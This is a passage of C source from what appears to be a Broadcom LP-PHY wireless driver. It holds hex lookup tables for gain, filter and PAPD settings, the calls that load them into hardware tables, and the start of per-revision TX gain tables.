0x00a4, 0x00a4, 0x00a4, 0x00a4, 0x00a4 }; static const uint32_t filterctl[] = { 0x000141fc, 0x000021fc, 0x000021b7, 0x0000416f, 0x0001ff27, 0x0000217f, 0x00002137, 0x000040ef, 0x0001fea7, 0x0000024f }; static const uint32_t psctl[] = { 0x00e38e08, 0x00e08e38, 0x00000000, 0x00000000, 0x00000000, 0x00002080, 0x00006180, 0x00003002, 0x00000040, 0x00002042, 0x00180047, 0x00080043, 0x00000041, 0x000020c1, 0x00046006, 0x00042002, 0x00040000, 0x00002003, 0x00180006, 0x00080002 }; static const uint32_t gainidx[] = { 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x10000001, 0x00000000, 0x20000082, 0x00000000, 0x40000104, 0x00000000, 0x60004207, 0x00000001, 0x7000838a, 0x00000001, 0xd021050d, 0x00000001, 0xe041c683, 0x00000001, 0x50828805, 0x00000000, 0x80e34288, 0x00000000, 0xb144040b, 0x00000000, 0xe1a6058e, 0x00000000, 0x12064711, 0x00000001, 0xb0a18612, 0x00000010, 0xe1024794, 0x00000010, 0x11630915, 0x00000011, 0x31c3ca1b, 0x00000011, 0xc1848a9c, 0x00000018, 0xf1e50da0, 0x00000018, 0x22468e21, 0x00000019, 0x4286d023, 0x00000019, 0xa347d0a4, 0x00000019, 0xb36811a6, 0x00000019, 0xf3e89227, 0x00000019, 0x0408d329, 0x0000001a, 0x244953aa, 0x0000001a, 0x346994ab, 0x0000001a, 0x54aa152c, 0x0000001a, 0x64ca55ad, 0x0000001a, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x10000001, 0x00000000, 0x20000082, 0x00000000, 0x40000104, 0x00000000, 0x60004207, 0x00000001, 0x7000838a, 0x00000001, 0xd021050d, 0x00000001, 0xe041c683, 0x00000001, 0x50828805, 0x00000000, 0x80e34288, 0x00000000, 0xb144040b, 0x00000000, 0xe1a6058e, 0x00000000, 0x12064711, 0x00000001, 0xb0a18612, 0x00000010, 0xe1024794, 0x00000010, 0x11630915, 0x00000011, 0x31c3ca1b, 0x00000011, 0xc1848a9c, 0x00000018, 0xf1e50da0, 0x00000018, 0x22468e21, 0x00000019, 0x4286d023, 0x00000019, 0xa347d0a4, 0x00000019, 0xb36811a6, 0x00000019, 0xf3e89227, 0x00000019, 0x0408d329, 0x0000001a, 0x244953aa, 0x0000001a, 0x346994ab, 0x0000001a, 0x54aa152c, 0x0000001a, 0x64ca55ad, 0x0000001a }; static const uint16_t auxgainidx[] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0001, 0x0002, 0x0004, 0x0016, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0001, 0x0002, 0x0004, 0x0016 }; static const uint16_t swctl[] = { 0x0128, 0x0128, 0x0009, 0x0009, 0x0028, 0x0028, 0x0028, 0x0028, 0x0128, 0x0128, 0x0009, 0x0009, 0x0028, 0x0028, 0x0028, 0x0028, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0128, 0x0128, 0x0009, 0x0009, 0x0028, 0x0028, 0x0028, 0x0028, 0x0128, 0x0128, 0x0009, 0x0009, 0x0028, 0x0028, 0x0028, 0x0028, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0009, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018, 0x0018 }; static const uint8_t hf[] = { 0x4b, 0x36, 0x24, 0x18, 0x49, 0x34, 0x23, 0x17, 0x48, 0x33, 0x23, 0x17, 0x48, 0x33, 0x23, 0x17 }; static const uint32_t gainval[] = { 0x00000008, 0x0000000e, 0x00000014, 0x0000001a, 0x000000fb, 0x00000004, 0x00000008, 0x0000000d, 0x00000001, 0x00000004, 0x00000007, 0x0000000a, 0x0000000d, 0x00000010, 0x00000012, 0x00000015, 0x00000000, 0x00000006, 0x0000000c, 0x00000000, 0x00000000, 0x00000000, 0x00000012, 0x00000000, 0x00000000, 
0x00000000, 0x00000018, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000001e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000003, 0x00000006, 0x00000009, 0x0000000c, 0x0000000f, 0x00000012, 0x00000015, 0x00000018, 0x0000001b, 0x0000001e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000009, 0x000000f1, 0x00000000, 0x00000000 }; static const uint16_t gain[] = { 0x0000, 0x0400, 0x0800, 0x0802, 0x0804, 0x0806, 0x0807, 0x0808, 0x080a, 0x080b, 0x080c, 0x080e, 0x080f, 0x0810, 0x0812, 0x0813, 0x0814, 0x0816, 0x0817, 0x081a, 0x081b, 0x081f, 0x0820, 0x0824, 0x0830, 0x0834, 0x0837, 0x083b, 0x083f, 0x0840, 0x0844, 0x0857, 0x085b, 0x085f, 0x08d7, 0x08db, 0x08df, 0x0957, 0x095b, 0x095f, 0x0b57, 0x0b5b, 0x0b5f, 0x0f5f, 0x135f, 0x175f, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000 }; static const uint32_t papdeps[] = { 0x00000000, 0x00013ffc, 0x0001dff3, 0x0001bff0, 0x00023fe9, 0x00021fdf, 0x00028fdf, 0x00033fd2, 0x00039fcb, 0x00043fc7, 0x0004efc2, 0x00055fb5, 0x0005cfb0, 0x00063fa8, 0x00068fa3, 0x00071f98, 0x0007ef92, 0x00084f8b, 0x0008df82, 0x00097f77, 0x0009df69, 0x000a3f62, 0x000adf57, 0x000b6f4c, 0x000bff41, 0x000c9f39, 0x000cff30, 0x000dbf27, 0x000e4f1e, 0x000edf16, 0x000f7f13, 0x00102f11, 0x00110f10, 0x0011df11, 0x0012ef15, 0x00143f1c, 0x00158f27, 0x00172f35, 0x00193f47, 0x001baf5f, 0x001e6f7e, 0x0021cfa4, 0x0025bfd2, 0x002a2008, 0x002fb047, 0x00360090, 0x003d40e0, 0x0045c135, 0x004fb189, 0x005ae1d7, 0x0067221d, 0x0075025a, 0x007ff291, 0x007ff2bf, 0x007ff2e3, 0x007ff2ff, 0x007ff315, 0x007ff329, 0x007ff33f, 0x007ff356, 0x007ff36e, 0x007ff39c, 0x007ff441, 0x007ff506 }; static const uint32_t papdmult[] = { 0x001111e0, 0x00652051, 0x00606055, 0x005b005a, 0x00555060, 0x00511065, 0x004c806b, 0x0047d072, 0x00444078, 0x00400080, 0x003ca087, 0x0039408f, 0x0035e098, 0x0032e0a1, 0x003030aa, 0x002d80b4, 0x002ae0bf, 0x002880ca, 0x002640d6, 0x002410e3, 0x002220f0, 0x002020ff, 0x001e510e, 0x001ca11e, 0x001b012f, 0x00199140, 0x00182153, 0x0016c168, 0x0015817d, 0x00145193, 0x001321ab, 0x001211c5, 0x001111e0, 0x001021fc, 0x000f321a, 0x000e523a, 0x000d925c, 0x000cd27f, 0x000c12a5, 0x000b62cd, 0x000ac2f8, 0x000a2325, 0x00099355, 0x00091387, 0x000883bd, 0x000813f5, 0x0007a432, 0x00073471, 0x0006c4b5, 0x000664fc, 0x00061547, 0x0005b598, 0x000565ec, 0x00051646, 0x0004d6a5, 0x0004870a, 0x00044775, 0x000407e6, 0x0003d85e, 0x000398dd, 0x00036963, 0x000339f2, 0x00030a89, 0x0002db28 }; static const uint32_t gainidx_a0[] = { 0x001111e0, 0x00652051, 0x00606055, 0x005b005a, 0x00555060, 0x00511065, 0x004c806b, 0x0047d072, 0x00444078, 0x00400080, 0x003ca087, 0x0039408f, 0x0035e098, 0x0032e0a1, 0x003030aa, 0x002d80b4, 0x002ae0bf, 0x002880ca, 0x002640d6, 0x002410e3, 0x002220f0, 0x002020ff, 0x001e510e, 0x001ca11e, 0x001b012f, 0x00199140, 0x00182153, 0x0016c168, 0x0015817d, 0x00145193, 0x001321ab, 0x001211c5, 0x001111e0, 0x001021fc, 0x000f321a, 0x000e523a, 0x000d925c, 0x000cd27f, 0x000c12a5, 0x000b62cd, 0x000ac2f8, 0x000a2325, 0x00099355, 0x00091387, 0x000883bd, 0x000813f5, 0x0007a432, 0x00073471, 
0x0006c4b5, 0x000664fc, 0x00061547, 0x0005b598, 0x000565ec, 0x00051646, 0x0004d6a5, 0x0004870a, 0x00044775, 0x000407e6, 0x0003d85e, 0x000398dd, 0x00036963, 0x000339f2, 0x00030a89, 0x0002db28 }; static const uint16_t auxgainidx_a0[] = { 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0002, 0x0014, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0002, 0x0014 }; static const uint32_t gainval_a0[] = { 0x00000008, 0x0000000e, 0x00000014, 0x0000001a, 0x000000fb, 0x00000004, 0x00000008, 0x0000000d, 0x00000001, 0x00000004, 0x00000007, 0x0000000a, 0x0000000d, 0x00000010, 0x00000012, 0x00000015, 0x00000000, 0x00000006, 0x0000000c, 0x00000000, 0x00000000, 0x00000000, 0x00000012, 0x00000000, 0x00000000, 0x00000000, 0x00000018, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000001e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000003, 0x00000006, 0x00000009, 0x0000000c, 0x0000000f, 0x00000012, 0x00000015, 0x00000018, 0x0000001b, 0x0000001e, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x00000000, 0x0000000f, 0x000000f7, 0x00000000, 0x00000000 }; static const uint16_t gain_a0[] = { 0x0000, 0x0002, 0x0004, 0x0006, 0x0007, 0x0008, 0x000a, 0x000b, 0x000c, 0x000e, 0x000f, 0x0010, 0x0012, 0x0013, 0x0014, 0x0016, 0x0017, 0x001a, 0x001b, 0x001f, 0x0020, 0x0024, 0x0030, 0x0034, 0x0037, 0x003b, 0x003f, 0x0040, 0x0044, 0x0057, 0x005b, 0x005f, 0x00d7, 0x00db, 0x00df, 0x0157, 0x015b, 0x015f, 0x0357, 0x035b, 0x035f, 0x075f, 0x0b5f, 0x0f5f, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000, 0x0000 }; KASSERT(mac->mac_phy.rev < 2, ("%s:%d: fail", __func__, __LINE__)); for (i = 0; i < 704; i++) bwn_tab_write(mac, BWN_TAB_4(7, i), 0); bwn_tab_write_multi(mac, BWN_TAB_1(2, 0), N(bwn_tab_sigsq_tbl), bwn_tab_sigsq_tbl); bwn_tab_write_multi(mac, BWN_TAB_2(1, 0), N(noisescale), noisescale); bwn_tab_write_multi(mac, BWN_TAB_4(11, 0), N(filterctl), filterctl); bwn_tab_write_multi(mac, BWN_TAB_4(12, 0), N(psctl), psctl); bwn_tab_write_multi(mac, BWN_TAB_4(13, 0), N(gainidx), gainidx); bwn_tab_write_multi(mac, BWN_TAB_2(14, 0), N(auxgainidx), auxgainidx); bwn_tab_write_multi(mac, BWN_TAB_2(15, 0), N(swctl), swctl); bwn_tab_write_multi(mac, BWN_TAB_1(16, 0), N(hf), hf); bwn_tab_write_multi(mac, BWN_TAB_4(17, 0), N(gainval), gainval); bwn_tab_write_multi(mac, BWN_TAB_2(18, 0), N(gain), gain); bwn_tab_write_multi(mac, BWN_TAB_1(6, 0), N(bwn_tab_pllfrac_tbl), bwn_tab_pllfrac_tbl); bwn_tab_write_multi(mac, BWN_TAB_2(0, 0), N(bwn_tabl_iqlocal_tbl), bwn_tabl_iqlocal_tbl); bwn_tab_write_multi(mac, BWN_TAB_4(9, 0), N(papdeps), papdeps); bwn_tab_write_multi(mac, BWN_TAB_4(10, 0), N(papdmult), papdmult); if ((siba_get_chipid(sc->sc_dev) == 0x4325) && (siba_get_chiprev(sc->sc_dev) == 0)) { bwn_tab_write_multi(mac, BWN_TAB_4(13, 0), N(gainidx_a0), gainidx_a0); bwn_tab_write_multi(mac, BWN_TAB_2(14, 0), N(auxgainidx_a0), auxgainidx_a0); bwn_tab_write_multi(mac, BWN_TAB_4(17, 0), N(gainval_a0), gainval_a0); bwn_tab_write_multi(mac, 
BWN_TAB_2(18, 0), N(gain_a0), gain_a0); } } static void bwn_phy_lp_tblinit_txgain(struct bwn_mac *mac) { struct bwn_softc *sc = mac->mac_sc; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; static struct bwn_txgain_entry txgain_r2[] = { { 255, 255, 203, 0, 152 }, { 255, 255, 203, 0, 147 }, { 255, 255, 203, 0, 143 }, { 255, 255, 203, 0, 139 }, { 255, 255, 203, 0, 135 }, { 255, 255, 203, 0, 131 }, { 255, 255, 203, 0, 128 }, { 255, 255, 203, 0, 124 }, { 255, 255, 203, 0, 121 }, { 255, 255, 203, 0, 117 }, { 255, 255, 203, 0, 114 }, { 255, 255, 203, 0, 111 }, { 255, 255, 203, 0, 107 }, { 255, 255, 203, 0, 104 }, { 255, 255, 203, 0, 101 }, { 255, 255, 203, 0, 99 }, { 255, 255, 203, 0, 96 }, { 255, 255, 203, 0, 93 }, { 255, 255, 203, 0, 90 }, { 255, 255, 203, 0, 88 }, { 255, 255, 203, 0, 85 }, { 255, 255, 203, 0, 83 }, { 255, 255, 203, 0, 81 }, { 255, 255, 203, 0, 78 }, { 255, 255, 203, 0, 76 }, { 255, 255, 203, 0, 74 }, { 255, 255, 203, 0, 72 }, { 255, 255, 203, 0, 70 }, { 255, 255, 203, 0, 68 }, { 255, 255, 203, 0, 66 }, { 255, 255, 203, 0, 64 }, { 255, 255, 197, 0, 64 }, { 255, 255, 192, 0, 64 }, { 255, 255, 186, 0, 64 }, { 255, 255, 181, 0, 64 }, { 255, 255, 176, 0, 64 }, { 255, 255, 171, 0, 64 }, { 255, 255, 166, 0, 64 }, { 255, 255, 161, 0, 64 }, { 255, 255, 157, 0, 64 }, { 255, 255, 152, 0, 64 }, { 255, 255, 148, 0, 64 }, { 255, 255, 144, 0, 64 }, { 255, 255, 140, 0, 64 }, { 255, 255, 136, 0, 64 }, { 255, 255, 132, 0, 64 }, { 255, 255, 128, 0, 64 }, { 255, 255, 124, 0, 64 }, { 255, 255, 121, 0, 64 }, { 255, 255, 117, 0, 64 }, { 255, 255, 114, 0, 64 }, { 255, 255, 111, 0, 64 }, { 255, 255, 108, 0, 64 }, { 255, 255, 105, 0, 64 }, { 255, 255, 102, 0, 64 }, { 255, 255, 99, 0, 64 }, { 255, 255, 96, 0, 64 }, { 255, 255, 93, 0, 64 }, { 255, 255, 91, 0, 64 }, { 255, 255, 88, 0, 64 }, { 255, 255, 86, 0, 64 }, { 255, 255, 83, 0, 64 }, { 255, 255, 81, 0, 64 }, { 255, 255, 79, 0, 64 }, { 255, 255, 76, 0, 64 }, { 255, 255, 74, 0, 64 }, { 255, 255, 72, 0, 64 }, { 255, 255, 70, 0, 64 }, { 255, 255, 68, 0, 64 }, { 255, 255, 66, 0, 64 }, { 255, 255, 64, 0, 64 }, { 255, 248, 64, 0, 64 }, { 255, 248, 62, 0, 64 }, { 255, 241, 62, 0, 64 }, { 255, 241, 60, 0, 64 }, { 255, 234, 60, 0, 64 }, { 255, 234, 59, 0, 64 }, { 255, 227, 59, 0, 64 }, { 255, 227, 57, 0, 64 }, { 255, 221, 57, 0, 64 }, { 255, 221, 55, 0, 64 }, { 255, 215, 55, 0, 64 }, { 255, 215, 54, 0, 64 }, { 255, 208, 54, 0, 64 }, { 255, 208, 52, 0, 64 }, { 255, 203, 52, 0, 64 }, { 255, 203, 51, 0, 64 }, { 255, 197, 51, 0, 64 }, { 255, 197, 49, 0, 64 }, { 255, 191, 49, 0, 64 }, { 255, 191, 48, 0, 64 }, { 255, 186, 48, 0, 64 }, { 255, 186, 47, 0, 64 }, { 255, 181, 47, 0, 64 }, { 255, 181, 45, 0, 64 }, { 255, 175, 45, 0, 64 }, { 255, 175, 44, 0, 64 }, { 255, 170, 44, 0, 64 }, { 255, 170, 43, 0, 64 }, { 255, 166, 43, 0, 64 }, { 255, 166, 42, 0, 64 }, { 255, 161, 42, 0, 64 }, { 255, 161, 40, 0, 64 }, { 255, 156, 40, 0, 64 }, { 255, 156, 39, 0, 64 }, { 255, 152, 39, 0, 64 }, { 255, 152, 38, 0, 64 }, { 255, 148, 38, 0, 64 }, { 255, 148, 37, 0, 64 }, { 255, 143, 37, 0, 64 }, { 255, 143, 36, 0, 64 }, { 255, 139, 36, 0, 64 }, { 255, 139, 35, 0, 64 }, { 255, 135, 35, 0, 64 }, { 255, 135, 34, 0, 64 }, { 255, 132, 34, 0, 64 }, { 255, 132, 33, 0, 64 }, { 255, 128, 33, 0, 64 }, { 255, 128, 32, 0, 64 }, { 255, 124, 32, 0, 64 }, { 255, 124, 31, 0, 64 }, { 255, 121, 31, 0, 64 }, { 255, 121, 30, 0, 64 }, { 255, 117, 30, 0, 64 }, { 255, 117, 29, 0, 64 }, { 255, 114, 29, 0, 64 }, { 255, 114, 29, 0, 64 }, { 255, 111, 29, 0, 64 }, }; static struct 
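/*
 * The txgain_* arrays (txgain_r2 above and the variants that follow) are
 * per-revision TX gain ladders: the plain txgain_r<n> table is chosen when
 * the board flags indicate no (or a high-gain) external PA, otherwise a
 * band-specific 2 GHz or 5 GHz variant is used, and 128 entries are loaded
 * through bwn_phy_lp_gaintbl_write_multi() at the end of this function.
 * Each row appears to describe one power step as its gain-stage settings
 * plus a baseband multiplier.
 */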
bwn_txgain_entry txgain_2ghz_r2[] = { { 7, 99, 255, 0, 64 }, { 7, 96, 255, 0, 64 }, { 7, 93, 255, 0, 64 }, { 7, 90, 255, 0, 64 }, { 7, 88, 255, 0, 64 }, { 7, 85, 255, 0, 64 }, { 7, 83, 255, 0, 64 }, { 7, 81, 255, 0, 64 }, { 7, 78, 255, 0, 64 }, { 7, 76, 255, 0, 64 }, { 7, 74, 255, 0, 64 }, { 7, 72, 255, 0, 64 }, { 7, 70, 255, 0, 64 }, { 7, 68, 255, 0, 64 }, { 7, 66, 255, 0, 64 }, { 7, 64, 255, 0, 64 }, { 7, 64, 255, 0, 64 }, { 7, 62, 255, 0, 64 }, { 7, 62, 248, 0, 64 }, { 7, 60, 248, 0, 64 }, { 7, 60, 241, 0, 64 }, { 7, 59, 241, 0, 64 }, { 7, 59, 234, 0, 64 }, { 7, 57, 234, 0, 64 }, { 7, 57, 227, 0, 64 }, { 7, 55, 227, 0, 64 }, { 7, 55, 221, 0, 64 }, { 7, 54, 221, 0, 64 }, { 7, 54, 215, 0, 64 }, { 7, 52, 215, 0, 64 }, { 7, 52, 208, 0, 64 }, { 7, 51, 208, 0, 64 }, { 7, 51, 203, 0, 64 }, { 7, 49, 203, 0, 64 }, { 7, 49, 197, 0, 64 }, { 7, 48, 197, 0, 64 }, { 7, 48, 191, 0, 64 }, { 7, 47, 191, 0, 64 }, { 7, 47, 186, 0, 64 }, { 7, 45, 186, 0, 64 }, { 7, 45, 181, 0, 64 }, { 7, 44, 181, 0, 64 }, { 7, 44, 175, 0, 64 }, { 7, 43, 175, 0, 64 }, { 7, 43, 170, 0, 64 }, { 7, 42, 170, 0, 64 }, { 7, 42, 166, 0, 64 }, { 7, 40, 166, 0, 64 }, { 7, 40, 161, 0, 64 }, { 7, 39, 161, 0, 64 }, { 7, 39, 156, 0, 64 }, { 7, 38, 156, 0, 64 }, { 7, 38, 152, 0, 64 }, { 7, 37, 152, 0, 64 }, { 7, 37, 148, 0, 64 }, { 7, 36, 148, 0, 64 }, { 7, 36, 143, 0, 64 }, { 7, 35, 143, 0, 64 }, { 7, 35, 139, 0, 64 }, { 7, 34, 139, 0, 64 }, { 7, 34, 135, 0, 64 }, { 7, 33, 135, 0, 64 }, { 7, 33, 132, 0, 64 }, { 7, 32, 132, 0, 64 }, { 7, 32, 128, 0, 64 }, { 7, 31, 128, 0, 64 }, { 7, 31, 124, 0, 64 }, { 7, 30, 124, 0, 64 }, { 7, 30, 121, 0, 64 }, { 7, 29, 121, 0, 64 }, { 7, 29, 117, 0, 64 }, { 7, 29, 117, 0, 64 }, { 7, 29, 114, 0, 64 }, { 7, 28, 114, 0, 64 }, { 7, 28, 111, 0, 64 }, { 7, 27, 111, 0, 64 }, { 7, 27, 108, 0, 64 }, { 7, 26, 108, 0, 64 }, { 7, 26, 104, 0, 64 }, { 7, 25, 104, 0, 64 }, { 7, 25, 102, 0, 64 }, { 7, 25, 102, 0, 64 }, { 7, 25, 99, 0, 64 }, { 7, 24, 99, 0, 64 }, { 7, 24, 96, 0, 64 }, { 7, 23, 96, 0, 64 }, { 7, 23, 93, 0, 64 }, { 7, 23, 93, 0, 64 }, { 7, 23, 90, 0, 64 }, { 7, 22, 90, 0, 64 }, { 7, 22, 88, 0, 64 }, { 7, 21, 88, 0, 64 }, { 7, 21, 85, 0, 64 }, { 7, 21, 85, 0, 64 }, { 7, 21, 83, 0, 64 }, { 7, 20, 83, 0, 64 }, { 7, 20, 81, 0, 64 }, { 7, 20, 81, 0, 64 }, { 7, 20, 78, 0, 64 }, { 7, 19, 78, 0, 64 }, { 7, 19, 76, 0, 64 }, { 7, 19, 76, 0, 64 }, { 7, 19, 74, 0, 64 }, { 7, 18, 74, 0, 64 }, { 7, 18, 72, 0, 64 }, { 7, 18, 72, 0, 64 }, { 7, 18, 70, 0, 64 }, { 7, 17, 70, 0, 64 }, { 7, 17, 68, 0, 64 }, { 7, 17, 68, 0, 64 }, { 7, 17, 66, 0, 64 }, { 7, 16, 66, 0, 64 }, { 7, 16, 64, 0, 64 }, { 7, 16, 64, 0, 64 }, { 7, 16, 62, 0, 64 }, { 7, 15, 62, 0, 64 }, { 7, 15, 60, 0, 64 }, { 7, 15, 60, 0, 64 }, { 7, 15, 59, 0, 64 }, { 7, 14, 59, 0, 64 }, { 7, 14, 57, 0, 64 }, { 7, 14, 57, 0, 64 }, { 7, 14, 55, 0, 64 }, { 7, 14, 55, 0, 64 }, { 7, 14, 54, 0, 64 }, { 7, 13, 54, 0, 64 }, { 7, 13, 52, 0, 64 }, { 7, 13, 52, 0, 64 }, }; static struct bwn_txgain_entry txgain_5ghz_r2[] = { { 255, 255, 255, 0, 152 }, { 255, 255, 255, 0, 147 }, { 255, 255, 255, 0, 143 }, { 255, 255, 255, 0, 139 }, { 255, 255, 255, 0, 135 }, { 255, 255, 255, 0, 131 }, { 255, 255, 255, 0, 128 }, { 255, 255, 255, 0, 124 }, { 255, 255, 255, 0, 121 }, { 255, 255, 255, 0, 117 }, { 255, 255, 255, 0, 114 }, { 255, 255, 255, 0, 111 }, { 255, 255, 255, 0, 107 }, { 255, 255, 255, 0, 104 }, { 255, 255, 255, 0, 101 }, { 255, 255, 255, 0, 99 }, { 255, 255, 255, 0, 96 }, { 255, 255, 255, 0, 93 }, { 255, 255, 255, 0, 90 }, { 255, 255, 255, 0, 88 }, { 255, 255, 255, 0, 85 }, { 
255, 255, 255, 0, 83 }, { 255, 255, 255, 0, 81 }, { 255, 255, 255, 0, 78 }, { 255, 255, 255, 0, 76 }, { 255, 255, 255, 0, 74 }, { 255, 255, 255, 0, 72 }, { 255, 255, 255, 0, 70 }, { 255, 255, 255, 0, 68 }, { 255, 255, 255, 0, 66 }, { 255, 255, 255, 0, 64 }, { 255, 255, 248, 0, 64 }, { 255, 255, 241, 0, 64 }, { 255, 255, 234, 0, 64 }, { 255, 255, 227, 0, 64 }, { 255, 255, 221, 0, 64 }, { 255, 255, 215, 0, 64 }, { 255, 255, 208, 0, 64 }, { 255, 255, 203, 0, 64 }, { 255, 255, 197, 0, 64 }, { 255, 255, 191, 0, 64 }, { 255, 255, 186, 0, 64 }, { 255, 255, 181, 0, 64 }, { 255, 255, 175, 0, 64 }, { 255, 255, 170, 0, 64 }, { 255, 255, 166, 0, 64 }, { 255, 255, 161, 0, 64 }, { 255, 255, 156, 0, 64 }, { 255, 255, 152, 0, 64 }, { 255, 255, 148, 0, 64 }, { 255, 255, 143, 0, 64 }, { 255, 255, 139, 0, 64 }, { 255, 255, 135, 0, 64 }, { 255, 255, 132, 0, 64 }, { 255, 255, 128, 0, 64 }, { 255, 255, 124, 0, 64 }, { 255, 255, 121, 0, 64 }, { 255, 255, 117, 0, 64 }, { 255, 255, 114, 0, 64 }, { 255, 255, 111, 0, 64 }, { 255, 255, 108, 0, 64 }, { 255, 255, 104, 0, 64 }, { 255, 255, 102, 0, 64 }, { 255, 255, 99, 0, 64 }, { 255, 255, 96, 0, 64 }, { 255, 255, 93, 0, 64 }, { 255, 255, 90, 0, 64 }, { 255, 255, 88, 0, 64 }, { 255, 255, 85, 0, 64 }, { 255, 255, 83, 0, 64 }, { 255, 255, 81, 0, 64 }, { 255, 255, 78, 0, 64 }, { 255, 255, 76, 0, 64 }, { 255, 255, 74, 0, 64 }, { 255, 255, 72, 0, 64 }, { 255, 255, 70, 0, 64 }, { 255, 255, 68, 0, 64 }, { 255, 255, 66, 0, 64 }, { 255, 255, 64, 0, 64 }, { 255, 255, 64, 0, 64 }, { 255, 255, 62, 0, 64 }, { 255, 248, 62, 0, 64 }, { 255, 248, 60, 0, 64 }, { 255, 241, 60, 0, 64 }, { 255, 241, 59, 0, 64 }, { 255, 234, 59, 0, 64 }, { 255, 234, 57, 0, 64 }, { 255, 227, 57, 0, 64 }, { 255, 227, 55, 0, 64 }, { 255, 221, 55, 0, 64 }, { 255, 221, 54, 0, 64 }, { 255, 215, 54, 0, 64 }, { 255, 215, 52, 0, 64 }, { 255, 208, 52, 0, 64 }, { 255, 208, 51, 0, 64 }, { 255, 203, 51, 0, 64 }, { 255, 203, 49, 0, 64 }, { 255, 197, 49, 0, 64 }, { 255, 197, 48, 0, 64 }, { 255, 191, 48, 0, 64 }, { 255, 191, 47, 0, 64 }, { 255, 186, 47, 0, 64 }, { 255, 186, 45, 0, 64 }, { 255, 181, 45, 0, 64 }, { 255, 181, 44, 0, 64 }, { 255, 175, 44, 0, 64 }, { 255, 175, 43, 0, 64 }, { 255, 170, 43, 0, 64 }, { 255, 170, 42, 0, 64 }, { 255, 166, 42, 0, 64 }, { 255, 166, 40, 0, 64 }, { 255, 161, 40, 0, 64 }, { 255, 161, 39, 0, 64 }, { 255, 156, 39, 0, 64 }, { 255, 156, 38, 0, 64 }, { 255, 152, 38, 0, 64 }, { 255, 152, 37, 0, 64 }, { 255, 148, 37, 0, 64 }, { 255, 148, 36, 0, 64 }, { 255, 143, 36, 0, 64 }, { 255, 143, 35, 0, 64 }, { 255, 139, 35, 0, 64 }, { 255, 139, 34, 0, 64 }, { 255, 135, 34, 0, 64 }, { 255, 135, 33, 0, 64 }, { 255, 132, 33, 0, 64 }, { 255, 132, 32, 0, 64 }, { 255, 128, 32, 0, 64 } }; static struct bwn_txgain_entry txgain_r0[] = { { 7, 15, 14, 0, 152 }, { 7, 15, 14, 0, 147 }, { 7, 15, 14, 0, 143 }, { 7, 15, 14, 0, 139 }, { 7, 15, 14, 0, 135 }, { 7, 15, 14, 0, 131 }, { 7, 15, 14, 0, 128 }, { 7, 15, 14, 0, 124 }, { 7, 15, 14, 0, 121 }, { 7, 15, 14, 0, 117 }, { 7, 15, 14, 0, 114 }, { 7, 15, 14, 0, 111 }, { 7, 15, 14, 0, 107 }, { 7, 15, 14, 0, 104 }, { 7, 15, 14, 0, 101 }, { 7, 15, 14, 0, 99 }, { 7, 15, 14, 0, 96 }, { 7, 15, 14, 0, 93 }, { 7, 15, 14, 0, 90 }, { 7, 15, 14, 0, 88 }, { 7, 15, 14, 0, 85 }, { 7, 15, 14, 0, 83 }, { 7, 15, 14, 0, 81 }, { 7, 15, 14, 0, 78 }, { 7, 15, 14, 0, 76 }, { 7, 15, 14, 0, 74 }, { 7, 15, 14, 0, 72 }, { 7, 15, 14, 0, 70 }, { 7, 15, 14, 0, 68 }, { 7, 15, 14, 0, 66 }, { 7, 15, 14, 0, 64 }, { 7, 